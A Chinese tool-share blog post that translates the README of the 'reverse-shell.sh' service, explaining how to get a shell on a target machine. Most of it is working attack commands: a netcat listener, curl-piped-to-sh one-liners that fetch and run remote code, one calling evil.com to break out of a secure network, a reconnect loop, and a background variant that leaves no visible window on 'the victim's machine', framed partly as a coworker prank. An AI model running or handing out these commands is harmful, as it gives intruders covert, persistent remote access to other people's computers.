反弹Shell即服务 | reverse-shell.sh

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/lukechilds/reverse-shell

反弹Shell

反弹 Shell 即服务 - https://reverse-shell.sh

易于记忆的反弹 shell,应该适用于大多数类 Unix 系统。

检测目标上的可用软件并运行适当的负载。

用法

1.监听连接

在你的机器上,打开一个端口并监听它。 您可以使用 netcat 轻松完成此操作。

nc -l 1337

2.对目标执行反弹shell

在目标机器上,将 https://reverse-shell.sh/yourip:port 的输出通过管道传输到 sh。

curl https://reverse-shell.sh/192.168.0.69:1337 | sh

回到你的机器,你现在应该有一个 shell 提示符。

3. 别当混蛋

这意味着用于渗透测试或帮助同事理解为什么他们应该始终锁定他们的计算机。 请不要将此用于任何恶意行为。

演示

31f3c669d2235457

 

技巧

主机名

您可以使用主机名而不是 IP。

curl https://reverse-shell.sh/localhost:1337 | sh

远程连接

因为这是反弹连接,所以它可以穿过防火墙并连接到 Internet。

您可以在 evil.com 的服务器上侦听连接,并从安全网络内部获取反弹 shell:

curl https://reverse-shell.sh/evil.com:1337 | sh

重新连接

默认情况下,当 shell 退出时,您将失去连接。 您可能会不小心使用无效命令执行此操作。 您可以轻松地创建一个 shell,通过将其包装在 while 循环中来尝试重新连接。

while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done

如果您对同事这样做,请小心,如果他们离开办公室时仍在运行此程序,那么您就会打开他们进行攻击。

作为后台进程运行

终端会话需要保持打开状态以保持反弹 shell 连接。 如果您想恶作剧同事,这可能有点赠品。

以下命令将在后台进程中运行反弹 shell 并退出终端,不会在受害者的机器上留下任何看起来可疑的终端窗口。

确保在新的终端窗口中运行它,否则您将丢失现有会话中的所有工作。

sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit

标签:工具分享, 反弹shell